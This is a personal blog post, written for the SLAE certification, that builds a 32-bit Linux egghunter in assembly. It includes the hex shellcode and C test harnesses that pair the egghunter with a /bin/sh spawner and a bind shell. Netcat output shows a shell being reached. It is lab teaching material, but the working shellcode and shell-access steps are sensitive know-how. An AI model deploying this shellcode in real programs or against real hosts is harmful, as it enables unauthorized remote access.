<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.3.0" /><meta property="og:title" content="SLAE - Assignment 3 - Egghunter" /><meta name="author" content="fwinsnes" /><meta property="og:locale" content="en" /><meta name="description" content="Introduction" /><meta property="og:description" content="Introduction" /><link rel="canonical" href="https://whitecr0wz.github.io/posts/SLAE-Egghunter/" /><meta property="og:url" content="https://whitecr0wz.github.io/posts/SLAE-Egghunter/" /><meta property="og:site_name" content="Knowledge Library" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-16T05:44:00+00:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="SLAE - Assignment 3 - Egghunter" /><meta name="twitter:site" content="@whitecr0wz" /><meta name="twitter:creator" content="@fwinsnes" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"fwinsnes"},"dateModified":"2021-01-16T05:44:00+00:00","datePublished":"2021-01-16T05:44:00+00:00","description":"Introduction","headline":"SLAE - Assignment 3 - Egghunter","mainEntityOfPage":{"@type":"WebPage","@id":"https://whitecr0wz.github.io/posts/SLAE-Egghunter/"},"url":"https://whitecr0wz.github.io/posts/SLAE-Egghunter/"}</script><title>SLAE - Assignment 3 - Egghunter | Knowledge Library</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Knowledge Library"><meta name="application-name" content="Knowledge Library"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="https://whitecr0wz.github.io/assets/img/Felipe-Winsnes.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Knowledge Library</a></div><div class="site-subtitle font-italic">Just sharing interesting tech stuff :)</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://twitter.com/whitecr0wz" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>SLAE - Assignment 3 - Egghunter</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>SLAE - Assignment 3 - Egghunter</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1610775840" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Jan 16, 2021 </em> </span><div class="d-flex justify-content-between"> <span> By <em> Felipe Winsnes </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="565 words"> <em>3 min</em> read</span></div></div></div><div class="post-content"><h4 id="introduction"><span class="mr-2">Introduction</span><a href="#introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>These series of posts starting with the prefix “Assignment” will be created in order to fulfill the requirements of the SLAE certification. Today we are going to have a close look at Egghunters.</p><p>An Egghunter is a form of malware, commonly used during Exploit-Development sessions in order to process bigger shellcode when there is low space available. The process is quite simple, this will search for a specific tag within the memory. When found, the flow will be passed upon the instructions following the tag, executing the original shellcode.</p><p>The third assignment from the seven requires the creation of an Egghunter through the Assembly language, and converting such into <a href="https://es.wikipedia.org/wiki/Shellcode">shellcode</a>. Moreover, it is required to test such.</p><h5 id="methods"><span class="mr-2">Methods</span><a href="#methods" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><p>In order to create an Egghunter shellcode, there are several paths. However, as the time goes on, newer techniques are implemented that make shellcoding easier. I have chosen to cover a modern method which is fast, and tends to be very small regarding size. This method obeys the following procedure:</p><ul><li>The tag is saved on ESI<li>EBX is incremented<li>The value of EBX is compared with ESI. If positive, this should set the Zero Flag (ZF)<li>Repeat this process through a jump if not zero (JNZ) condition.<li>Jump into EBX.</ul><p>It is quite important to note that the tag does not contain an opocode that could interfere with our egghunter, such as an INC ESI (46), or DEC EBX (4B). The chosen tag is 45474547 (GEGE).</p><p>Code:</p><pre><code class="language-term">global _start

_start:

      mov esi, 0x45474547       ; Moves the tag GEGE into ESI

main:

      inc ebx                   ; Increments EBX for comparison.
      cmp dword [ebx], esi      ; Compares EBX with ESI, that contains the tag. If they contain the same value, set the Zero flag (ZF).
      jne main                  ; Jumps to main to repeat the loop until the Zero flag (ZF) is set.
      push ebx                  ; Pushes the value of EBX into the stack.
      ret                       ; Pops it into the EIP.
</code></pre><p>Let’s test this egghunter within the C format:</p><pre><code class="language-term">#include&lt;stdio.h&gt;
#include&lt;string.h&gt;

unsigned char egg[] = \
"\xbe\x47\x45\x47\x45\x43\x39\x33\x75\xfb\x53\xc3";

unsigned char code[] = \
"\x47\x45\x47\x45"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\xb0\x0b\xcd\x80";

main()
{

  printf("Shellcode size:  %d\n", strlen(code));
  printf("Egg size:  %d\n", strlen(egg));

        int (*ret)() = (int(*)())egg;

        ret();

}
</code></pre><h4 id="endgame"><span class="mr-2">EndGame</span><a href="#endgame" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">whitecr0wz@SLAE:~/assembly/assignments/Assignment_3$ gcc egghunter.c -o egghunter -fno-stack-protector -z execstack -w 
whitecr0wz@SLAE:~/assembly/assignments/Assignment_3$ ./egghunter 
Shellcode size:  26
Egg size:  12
$
</code></pre><p>Furthermore, there is an additional detail that the egghunter should be configurable for different payloads. As the only requirement is to leave the tag at the start of the payload, configuration for different shellcodes should be easy.</p><p>Let’s test this egghunter within the C format once again. I will now use the bind shell developed during <a href="https://whitecr0wz.github.io/posts/SLAE-Bind/">this</a> post.</p><pre><code class="language-term">#include&lt;stdio.h&gt;
#include&lt;string.h&gt;

unsigned char egg[] = \
"\xbe\x47\x45\x47\x45\x43\x39\x33\x75\xfb\x53\xc3";

unsigned char code[] = \
"\x47\x45\x47\x45"
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x66\x68\x67\x01\x66\x58\xb3\x02\xb1\x01\x52\xcd\x80\x89\xc6\x66\x68\x69\x01\x66\x58\x89\xf3\x52\x52\x66\x68\x23\x28\x66\x6a\x02\x89\xe1
\xb2\x10\xcd\x80\x66\x68\x6b\x01\x66\x58\x89\xf3\x31\xc9\x51\xcd\x80\x66\x68\x6c\x01\x66\x58\x89\xf3\x31\xc9\x31\xd2\x31\xf6\xcd\x80\x89\xc6\xb1\x03\x66\x6a\x3f\x66\x58\x89\xf3\
xfe\xc9\xcd\x80\x75\xf3\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\x66\x6a\x0b\x66\x58\xcd\x80";

main()
{

  printf("Shellcode size:  %d\n", strlen(code));
  printf("Egg size:  %d\n", strlen(egg));

        int (*ret)() = (int(*)())egg;

        ret();

}
</code></pre><h4 id="endgame-2"><span class="mr-2">EndGame #2</span><a href="#endgame-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">whitecr0wz@SLAE:~/assembly/assignments/Assignment_3$ gcc egghunter.c -o egghunter -fno-stack-protector -z execstack -w 
whitecr0wz@SLAE:~/assembly/assignments/Assignment_3$ ./egghunter 
Shellcode size:  131
Egg size:  12

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@whitecr0wz:~# rlwrap nc 192.168.100.200 9000 -v 
192.168.100.200: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.200] 9000 (?) open
python3 -c 'import pty;pty.spawn("/bin/bash")'
whitecr0wz@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_3$ id &amp;&amp; whoami 
&lt;wz/assembly/assignments/Assignment_3$ id &amp;&amp; whoami                 
uid=1001(whitecr0wz) gid=1001(whitecr0wz) groups=1001(whitecr0wz)
whitecr0wz
whitecr0wz@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_3$
</code></pre><h3 id="code"><span class="mr-2">Code</span><a href="#code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: <a href="http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/">http://securitytube-training.com/online- courses/securitytube-linux-assembly-expert/</a></p><p>Student ID: SLAE-27812/PA-27812</p><p>You can find all of the used resources within this post <a href="https://github.com/whitecr0wz/SLAE/tree/main/Assignment_3">here</a>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/slae/'>SLAE</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/assembly/" class="post-tag no-text-decoration" >assembly</a> <a href="/tags/shellcoding/" class="post-tag no-text-decoration" >shellcoding</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"></div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=SLAE+-+Assignment+3+-+Egghunter+-+Knowledge+Library&url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Egghunter%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=SLAE+-+Assignment+3+-+Egghunter+-+Knowledge+Library&u=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Egghunter%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Egghunter%2F&text=SLAE+-+Assignment+3+-+Egghunter+-+Knowledge+Library" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/VyOS-OSPF-I/">VyOS - OSPF Basic Network</a><li><a href="/posts/Alignments-on-windows-registers/">Alignments on Windows Registers</a><li><a href="/posts/Vulnserver-LTER/">Vulnserver LTER - SEH Extremely restricted character set</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/SLAE64-Egghunter/"><div class="card-body"> <em class="small" data-ts="1611467040" data-df="ll" > Jan 24, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 3 - Egghunter</h3><div class="text-muted small"><p> Introduction These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a clo...</p></div></div></a></div><div class="card"> <a href="/posts/SLAE64-Encoder/"><div class="card-body"> <em class="small" data-ts="1611553440" data-df="ll" > Jan 25, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 4 - Custom Insertion Encoder</h3><div class="text-muted small"><p> Introduction These series of posts starting with the prefix “Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a close look ...</p></div></div></a></div><div class="card"> <a href="/posts/SLAE64-Analyzing-Shellcode/"><div class="card-body"> <em class="small" data-ts="1611639840" data-df="ll" > Jan 26, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 5 - Analyzing 3rd party Shellcode</h3><div class="text-muted small"><p> These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. The fifth assignment from the seven requires ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/SLAE-Bind/" class="btn btn-outline-primary" prompt="Older"><p>SLAE - Assignment 2 - Reverse TCP Shellcode</p></a> <a href="/posts/SLAE-Custom-Encoder/" class="btn btn-outline-primary" prompt="Newer"><p>SLAE - Assignment 4 - Custom Insertion Encoder</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/whitecr0wz">Felipe Winsnes</a>.</p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
